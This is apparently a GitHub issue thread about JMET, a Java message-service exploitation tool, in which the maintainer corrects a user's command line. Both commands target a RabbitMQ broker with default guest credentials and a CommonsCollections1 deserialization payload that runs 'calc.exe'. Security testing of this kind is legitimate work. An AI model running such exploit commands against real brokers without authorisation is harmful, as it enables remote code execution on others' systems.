### ISSUE TITLE
ERROR d.c.j.JMET [main] Misconfiguration: host or port

### ISSUE THREAD

**Issue by SyCode7** [matthiaskaiser/jmet#5]
Hi ,

I am trying out your tool, not yet successful owing to the error below `ERROR d.c.j.JMET [main] Misconfiguration: host or port`  . I am trying our the command below against a RabbitMQ installation:
`java -jar jmet-0.1.0-all.jar -u guest -pw guest -T rabbit1  -I RabbitMQ -Y CommonsCollections1 calc.exe 172.17.8.127 30000` . Thanks !!

**Comment by matthiaskaiser** [comment]
Sorry for the late answer.
Please try:
java -jar jmet-0.1.0-all.jar -u guest -pw guest -T rabbit1 -I RabbitMQ -Y calc.exe -Yp CommonsCollections1 172.17.8.127 30000
